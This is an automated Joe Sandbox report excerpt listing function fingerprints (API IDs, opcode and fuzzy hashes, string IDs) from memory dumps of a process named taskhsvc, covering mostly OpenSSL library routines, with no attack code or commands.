                                                            • API ID: J_cmpJ_nid2objsk_numsk_value
                                                            • String ID:
                                                            • API String ID: 2170567254-0
                                                            • Opcode ID: 77da99486d0596b3da65bf96b865a25f81b75ee52e1b6cbbe4e27c9be3e00215
                                                            • Instruction ID: 8dc1fa05e303f3627b926b15d451dd912cc3dde5ac13fd96bc120940295a4c8a
                                                            • Opcode Fuzzy Hash: 77da99486d0596b3da65bf96b865a25f81b75ee52e1b6cbbe4e27c9be3e00215
                                                            • Instruction Fuzzy Hash: C1910975615B019FDB00DF3AC58065BB7F4BF86358F12592EEAA4C7B00E731E8468B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1675fb61651dd7a3f8791bb17c85c583399602ee136fc56426da05532e6f4a14
                                                            • Instruction ID: def66ed19838262a13d0d7cb60f81c1226ff2f517a9222340e1f8300d8cd2ccc
                                                            • Opcode Fuzzy Hash: 1675fb61651dd7a3f8791bb17c85c583399602ee136fc56426da05532e6f4a14
                                                            • Instruction Fuzzy Hash: E451E6B25083029BE300AF65D14476FBFE0AB84758F12CD2DE8D85BB41D7BAC4488B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_set$J_nid2obj$E_newT_new$D_newG_type_newR_put_error
                                                            • String ID: n$p
                                                            • API String ID: 3047261868-484814754
                                                            • Opcode ID: ac65f36de970dd7cd0913b68bf12cb10f6ee5a08edcd8a746e1e895c7b1f56db
                                                            • Instruction ID: 0db1fad455e831aa1c06826cfd4a191bfe77546bccafd745b232d32045d04d4f
                                                            • Opcode Fuzzy Hash: ac65f36de970dd7cd0913b68bf12cb10f6ee5a08edcd8a746e1e895c7b1f56db
                                                            • Instruction Fuzzy Hash: 424116B0209B018FE720EF79D59539ABBF0AF45308F11492DD9918BB50E7B9E448DB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mem_ctrl$lh_new
                                                            • String ID: W
                                                            • API String ID: 539576009-655174618
                                                            • Opcode ID: f940a8bf19e81e6c91f5d6244e87904d6d44aac7e87335c665c43358cb011a73
                                                            • Instruction ID: 5333c03860f443b62e43154f84308693fdb12e789af2534909a909cc07b27a9f
                                                            • Opcode Fuzzy Hash: f940a8bf19e81e6c91f5d6244e87904d6d44aac7e87335c665c43358cb011a73
                                                            • Instruction Fuzzy Hash: 80411B75A097049FEB50EF25C54175ABBF9FB49308F22891EE4D48BB00D778A845CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_obj2nidsk_push$E_newJ_nid2objR_newR_put_errorX509_lh_retrievesk_num
                                                            • String ID: A$g
                                                            • API String ID: 1975297513-2888248248
                                                            • Opcode ID: 60202317244ab181409ef3e358b45ea9099b8433ea7e223b4336db5c01274505
                                                            • Instruction ID: 143f344d7375352b7d3c02973d70cf94b1342202b0bebc5d170bedf0950a1157
                                                            • Opcode Fuzzy Hash: 60202317244ab181409ef3e358b45ea9099b8433ea7e223b4336db5c01274505
                                                            • Instruction Fuzzy Hash: C94115B55087019FD700EF2AD58065EBBF0BF86348F12892DE9988BB01D778E445CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_sk_numsk_value$N1_item_dupR_put_errorY_dupY_freesk_insert
                                                            • String ID: C$s
                                                            • API String ID: 2666543026-3044617131
                                                            • Opcode ID: aa772484907f64359ee42ff771121ac1192825fadef09769bfa2f1bb12f994e5
                                                            • Instruction ID: 9e36b56eb6d5824edeee36e7c6de9348aad83aed3d0cc75dc90537f4dd47a14a
                                                            • Opcode Fuzzy Hash: aa772484907f64359ee42ff771121ac1192825fadef09769bfa2f1bb12f994e5
                                                            • Instruction Fuzzy Hash: FE514AB25087219FD700EF25C58035BBBF0BF84748F129A2DE9A897740D774E9868BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18ddff857b250672441fa2fc4f92ff9bc66b1f48ff71380f8839aed6a9f8a1b0
                                                            • Instruction ID: b4d2ac0f5f977d5fd7a467f601a6bf9cee7067b05e1e020aacdb61c3475bbbb6
                                                            • Opcode Fuzzy Hash: 18ddff857b250672441fa2fc4f92ff9bc66b1f48ff71380f8839aed6a9f8a1b0
                                                            • Instruction Fuzzy Hash: B0616CB41093809AE7409F66A18522AFFF17F86248F64C99EE4D88FB51D770C04ACB63
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: C
                                                            • API String ID: 0-1037565863
                                                            • Opcode ID: 9c00820e392a905f99e247ae6b6e3175b104b2a7f6536840d2f28fcfcb893b75
                                                            • Instruction ID: 9eb0b3b36d0995da5c1dd7b7612f5bfdc4076b11f51ba81794cc741d4ca7b87f
                                                            • Opcode Fuzzy Hash: 9c00820e392a905f99e247ae6b6e3175b104b2a7f6536840d2f28fcfcb893b75
                                                            • Instruction Fuzzy Hash: 345150B0209721AFC740AF79C5C061BB7F0AF85348F15AAACE59D8BB54E774D8458BC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocsk_pushstrlen$O_ctrlO_getsO_newO_s_memsk_new_nullstrncmp
                                                            • String ID: multipart/signed
                                                            • API String ID: 2549726919-540133298
                                                            • Opcode ID: 4ad3e580414727f5b08935e82d9fb02af40db00e40404be06ab647831ffedec3
                                                            • Instruction ID: fbebbdf027bf99083bc3d1f407d92717ff73c3b7b4345dac9b515b69f2a6fc79
                                                            • Opcode Fuzzy Hash: 4ad3e580414727f5b08935e82d9fb02af40db00e40404be06ab647831ffedec3
                                                            • Instruction Fuzzy Hash: 0B51F3B5A0D3458BE700DF25C08835BBBE0BF84318F154E2DE5A897A40D378D6498BC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_ALGOR_new.LIBEAY32 ref: 6CF6A41E
                                                              • Part of subcall function 6CF04370: ASN1_item_new.LIBEAY32 ref: 6CF04385
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6A517
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_newR_newR_put_errorX509_
                                                            • String ID: A$h$w$|
                                                            • API String ID: 4170272431-2631548946
                                                            • Opcode ID: a7c380dae0cd27821967b5ccb657546527e4a87576adb47bb9105f1ec0294a09
                                                            • Instruction ID: befc57cb8cf1bccafc1b1457b5b65f53db4d238be6ef60e591840b22cfa6f079
                                                            • Opcode Fuzzy Hash: a7c380dae0cd27821967b5ccb657546527e4a87576adb47bb9105f1ec0294a09
                                                            • Instruction Fuzzy Hash: C22127B15083119FE700DF2AC54865BBBF0BF85348F12891DE9988BB51E7B9E844CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: d2049ec3897ec973bafb24757682f6863ab4a6b6f3dfeb52bd34ccd933d6e8da
                                                            • Instruction ID: ab86578e5446b191d67c54c7283f189ee45fd704f8e58851eebb8d0ede5bd4b5
                                                            • Opcode Fuzzy Hash: d2049ec3897ec973bafb24757682f6863ab4a6b6f3dfeb52bd34ccd933d6e8da
                                                            • Instruction Fuzzy Hash: DD814875A097008FCB10DF38D58065ABFF4BB86318F528A1DE5A8E7B41E730E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: 58dd6135238c269401fa0c49ad6f9988fc5f18985a6a4e526bd44ce6e5e97240
                                                            • Instruction ID: 3508d63f1b437a8f844a29c900d907183603f55c3111dc0f1c39788b1a62837c
                                                            • Opcode Fuzzy Hash: 58dd6135238c269401fa0c49ad6f9988fc5f18985a6a4e526bd44ce6e5e97240
                                                            • Instruction Fuzzy Hash: 7C51E5756097019FCB10EF39C68055FBBF1AB89708F52992CE9A4CB710D330E9459F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A${
                                                            • API String ID: 0-3089528823
                                                            • Opcode ID: 49887e7fbcca7c21046430d741f997b314ae71984241e5ffa71e805eb8192e72
                                                            • Instruction ID: 6d99050d5906026a1d47cee2b53143b5f8fb31b808687f6f104729d529aefdf2
                                                            • Opcode Fuzzy Hash: 49887e7fbcca7c21046430d741f997b314ae71984241e5ffa71e805eb8192e72
                                                            • Instruction Fuzzy Hash: 1661F870609B418FD700DF25C18871ABBF0BF8535CF22895CE9A88B795D779E846CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CE23B7B), ref: 6CE21F35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: %I64i$:$ERROR$OPENSSL_ia32cap$dynamic
                                                            • API String ID: 4216919130-991228966
                                                            • Opcode ID: 59540a810897ba135405ce58ad0939a1dac7738d87b0ed6f643f82f61e1ddab8
                                                            • Instruction ID: 4b23d210d70e3527632c3ec3c9976dd58cb171caa1a3ed82c62447450490b362
                                                            • Opcode Fuzzy Hash: 59540a810897ba135405ce58ad0939a1dac7738d87b0ed6f643f82f61e1ddab8
                                                            • Instruction Fuzzy Hash: E0415331A246008FDF50EF69C580B0AB7F1FB8A318F56891DD6648B700E335EA05CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Startup__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2179458116-0
                                                            • Opcode ID: d1fc1a5099482481f4ad226b06f25eb6f57868b527d8761ff9d2d8237c65975e
                                                            • Instruction ID: d7d45adfa863ca4d54aebad11f976f09e202e3ac9b042507b15b97947ba39e72
                                                            • Opcode Fuzzy Hash: d1fc1a5099482481f4ad226b06f25eb6f57868b527d8761ff9d2d8237c65975e
                                                            • Instruction Fuzzy Hash: 7C916771618B408FDB40DF28C64631ABBF1BB86308F21892DE9B48B750D771E906CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$X_start
                                                            • String ID:
                                                            • API String ID: 955869817-0
                                                            • Opcode ID: 5ce9c72dac58f78521c61ae7231d67b41105de5b13ec58f1ef38631c91f5c54a
                                                            • Instruction ID: 1b5584f1128cafd7006b353f115b36cb035c3b4b34bb661d4a86ab793eeebf7f
                                                            • Opcode Fuzzy Hash: 5ce9c72dac58f78521c61ae7231d67b41105de5b13ec58f1ef38631c91f5c54a
                                                            • Instruction Fuzzy Hash: E1419FB0558B048FD3609F2AC58075ABBF0AF89758F21891DE9D987B50E739D848CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_dup__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 22153326-0
                                                            • Opcode ID: c4aadba2f9519c588aad9043a153b2f1b33a587443ac9ffd7e014e8808ba25df
                                                            • Instruction ID: 5a4ce6b481315c8487e03a542d24ebd32b308c28572e067be9fe065bd677ff44
                                                            • Opcode Fuzzy Hash: c4aadba2f9519c588aad9043a153b2f1b33a587443ac9ffd7e014e8808ba25df
                                                            • Instruction Fuzzy Hash: CF614C71716B018FDB10DF69C59065BB7F0AF89B48F56592EE9A4CBB00E730E801DB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CF09D30), ref: 6CF34EC7
                                                            • i2d_X509_NAME.LIBEAY32 ref: 6CF34EF3
                                                            • EVP_sha1.LIBEAY32 ref: 6CF34EF8
                                                            • EVP_Digest.LIBEAY32 ref: 6CF34F26
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: DigestP_sha1X509___stack_chk_faili2d_
                                                            • String ID:
                                                            • API String ID: 740775491-0
                                                            • Opcode ID: 9c98ac777c223b8b6cb096e21c2ebde3d95e01faca9ab9a1df20c884b0bb333b
                                                            • Instruction ID: 6774bb769c23a4daa12f2f91569c27251ea13b34795cadeae8674a639f8d561f
                                                            • Opcode Fuzzy Hash: 9c98ac777c223b8b6cb096e21c2ebde3d95e01faca9ab9a1df20c884b0bb333b
                                                            • Instruction Fuzzy Hash: 115108B56187009FDB40EF28C580A4ABBF0FF88358F46995DE9999B710E335E905CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: e$q
                                                            • API String ID: 0-1740075221
                                                            • Opcode ID: 2e544835028306fde355e452f012fd1108cb4f53da23d7d187d6514219e7eba7
                                                            • Instruction ID: f199dd454de9dbfdeb5e2895ac7d035ffb30222b6ea0ed090eb6ae346eafba2f
                                                            • Opcode Fuzzy Hash: 2e544835028306fde355e452f012fd1108cb4f53da23d7d187d6514219e7eba7
                                                            • Instruction Fuzzy Hash: B0411B756197009FDB10EF79C580B5BBBF1AB89318F22891CE9A4CB740D735E906CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1934435860-0
                                                            • Opcode ID: 7832ef4c20b7d060f52d4b88ac18e45766c5eff0be748f8a7fa7f349d4bd7620
                                                            • Instruction ID: 1cbfa64d68f6bfa6719a5dc8b5c4fb8a87cc965ac2c4cb6ecfbcef8e4ba2f2bc
                                                            • Opcode Fuzzy Hash: 7832ef4c20b7d060f52d4b88ac18e45766c5eff0be748f8a7fa7f349d4bd7620
                                                            • Instruction Fuzzy Hash: C641D1716197409FCB50EF79D280A4FBBF0AB89318F46991CE5A4CBB00D331E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_checkX509_cmp_timetime
                                                            • String ID:
                                                            • API String ID: 911605100-0
                                                            • Opcode ID: 4d8a15a04f8cb8aa4390c751c77f7238d5732f8b7896b181f2363524c5e2b2f7
                                                            • Instruction ID: 40d3ffa1812f4d817c301fb0809d1767782be91acdeac5c6351d33713a829726
                                                            • Opcode Fuzzy Hash: 4d8a15a04f8cb8aa4390c751c77f7238d5732f8b7896b181f2363524c5e2b2f7
                                                            • Instruction Fuzzy Hash: 1A31F3B250D301DBE300DF65D98464BBFF4AF85398F02891EE8988B750D7B8E5498F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PKCS7_new.LIBEAY32 ref: 6CF6AC24
                                                              • Part of subcall function 6CF63470: ASN1_item_new.LIBEAY32 ref: 6CF63485
                                                            • OBJ_nid2obj.LIBEAY32 ref: 6CF6AC36
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF6AC45
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6AC51
                                                            • ASN1_item_pack.LIBEAY32 ref: 6CF6AC64
                                                              • Part of subcall function 6CF26B40: CRYPTO_free.LIBEAY32 ref: 6CF26B72
                                                              • Part of subcall function 6CF26B40: ASN1_item_i2d.LIBEAY32 ref: 6CF26B8C
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6ACB7
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6ACE7
                                                            • PKCS7_free.LIBEAY32 ref: 6CF6ACEF
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6AD22
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF6AD29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$G_type_newJ_nid2objN1_item_i2dN1_item_newN1_item_packO_freeO_mallocS12_S7_freeS7_newS_it__stack_chk_fail
                                                            • String ID: d$r
                                                            • API String ID: 2932449127-4286335832
                                                            • Opcode ID: 21823948ba1bd5813a3b3cb82facde60486af2e0f4e79024c2a75e0ffad81c8e
                                                            • Instruction ID: 0ea3ddca75c0deacc56e60bc54b2f2d353389c7c55c2d31b8419af4df2c775fa
                                                            • Opcode Fuzzy Hash: 21823948ba1bd5813a3b3cb82facde60486af2e0f4e79024c2a75e0ffad81c8e
                                                            • Instruction Fuzzy Hash: 4121EEB18193419FE700AF66C54434BBBF0BF85348F12881CE9D88BB51D7B9D649CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: 994c239d67836c9380f11d9d7f3146c9466809af7a250dfd3857666f8a2fb3cc
                                                            • Instruction ID: 6ae7ce26f07d31abedd460c429790288154c3e8f2609144b423f282228f5d3c1
                                                            • Opcode Fuzzy Hash: 994c239d67836c9380f11d9d7f3146c9466809af7a250dfd3857666f8a2fb3cc
                                                            • Instruction Fuzzy Hash: 2E4107759097419FCB40EF39C68164BBBF1BB89318F86991CE5A48B700E331E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: &$j
                                                            • API String ID: 4216919130-2668530336
                                                            • Opcode ID: e523267f4268e4f72f0ceb8e6f670eab2c4c5e7e78684602baf3e47bf34515f3
                                                            • Instruction ID: 26031489083addd80602bc5ea84d23ca3b0cfec79f6a580d7377651f13b89a1a
                                                            • Opcode Fuzzy Hash: e523267f4268e4f72f0ceb8e6f670eab2c4c5e7e78684602baf3e47bf34515f3
                                                            • Instruction Fuzzy Hash: 284115B0614B018FEB00DF69C58471BBBF4BB45308F26891CEA949B741D775E845CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BIO_s_file.LIBEAY32 ref: 6CE9889E
                                                            • BIO_new.LIBEAY32 ref: 6CE988A6
                                                              • Part of subcall function 6CEC4560: CRYPTO_malloc.LIBEAY32 ref: 6CEC458C
                                                            • ERR_put_error.LIBEAY32 ref: 6CE98967
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_newO_s_fileR_put_error
                                                            • String ID: $k
                                                            • API String ID: 3557565517-3968124548
                                                            • Opcode ID: 2af53656dcda9c05491a4b4602f456705fb027428669895688a116c0d1c7af70
                                                            • Instruction ID: 53ca84383f69e175bd724fbfc327d267f929c1915826f53817a9d9734b182a0e
                                                            • Opcode Fuzzy Hash: 2af53656dcda9c05491a4b4602f456705fb027428669895688a116c0d1c7af70
                                                            • Instruction Fuzzy Hash: 963128725087009BDB10DF31C64464BBBF4BB89358F12891DEAA4AB700D375E90A8BD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BIO_puts.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C5D9
                                                            • i2a_ASN1_OBJECT.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C5EF
                                                              • Part of subcall function 6CEF8B00: OBJ_obj2txt.LIBEAY32 ref: 6CEF8B49
                                                              • Part of subcall function 6CEF8B00: BIO_write.LIBEAY32 ref: 6CEF8B70
                                                            • OBJ_obj2nid.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C601
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • BIO_write.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C694
                                                            • BIO_indent.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C6B0
                                                            • BIO_printf.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C6F7
                                                            • BIO_write.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF0C713
                                                            • OBJ_find_sigid_algs.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C743
                                                            • EVP_PKEY_asn1_find.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C75F
                                                            • BIO_puts.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CF0C7AB
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_write$O_puts$J_find_sigid_algsJ_obj2nidJ_obj2txtO_indentO_printfY_asn1_findi2a_lh_retrieve
                                                            • String ID:
                                                            • API String ID: 550840016-0
                                                            • Opcode ID: 75106e644530129420ca50c399014a91aeb4c1449539c2a60943ca05e6a6540c
                                                            • Instruction ID: 358e5dfafe57f731a771c2e65c024dc821cd15f9524d0746f789ca9f33092f40
                                                            • Opcode Fuzzy Hash: 75106e644530129420ca50c399014a91aeb4c1449539c2a60943ca05e6a6540c
                                                            • Instruction Fuzzy Hash: C55115B23097029BD310AF25CA9076BBBF4AF84748F519C2DE998CBB10E735D4459B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: D_currentO_lock__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2538204191-0
                                                            • Opcode ID: 4e4e9ff710229d37d2e3281e978abb933149259466c2e9c125d569d0a505b4b7
                                                            • Instruction ID: 9788490fb493fe450237f8dab64acb938ffba423094150456c10df70bc5685ca
                                                            • Opcode Fuzzy Hash: 4e4e9ff710229d37d2e3281e978abb933149259466c2e9c125d569d0a505b4b7
                                                            • Instruction Fuzzy Hash: 2F4115B05193059BEB04DF21D58574BBBF4EF81748F21881EE9984BB50D7B9D448CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
